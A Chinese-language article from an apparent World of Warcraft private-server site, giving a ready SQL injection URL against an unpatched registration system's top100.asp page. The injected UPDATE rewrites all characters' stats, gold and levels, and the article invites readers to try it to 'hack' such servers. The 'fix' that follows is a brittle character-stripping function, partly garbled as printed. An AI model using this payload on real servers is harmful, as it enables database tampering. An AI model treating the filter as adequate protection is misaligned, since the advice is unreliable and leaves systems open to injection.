魔兽世界私服 家族联盟 经验交流 高手进阶心得 发布家族 软件下载 广告合作 魔兽世界私服技术文章
热门关键字: 经验 战无不胜 战神魔域 奇迹 宝宝 魔域私服 战无不胜魔域 法师

SQL注入法BUG+解决办法

SQL注入:命令如下不信可以去试试,找个唯我独尊的注册系统没修改过的就能黑 http://xxx.xxxx.xxx/top100.asp?sx=energy;update character set strength=1,dexterity=1,energy=1,vitality=1,money=-1414141414,pktime=5000,clevel=9999,pkcount=100,pklevel=100 where strength>1;-- 解决方法 在 conn.asp 中加入 function CheckStr(str) str=replace(str,"","") str=replace(str,"=","") str=replace(str,";","") str=replace(str,">","") str=replace(str,"<","") str=replace(str,"%","") CheckStr=str end function  

最新文章 推荐文章
请团结一致,迎接nerf 尊严输出贼们,不要太高兴
盗贼80PVP各种职业打法,及天赋加 魔兽世界·骑士铭
魔兽世界钓鱼大赛心得 “对不起,你是个好人”-巫妖王之怒继
BLZ关于QS的最新蓝帖及蓝帖回复 职业属性点分配值
新开魔兽世界私服 变态魔兽世界私服 网通魔兽世界私服
DDD魔兽世界私服发布网 www.dddmy.com 提供最新开魔兽世界私服发布 版权所有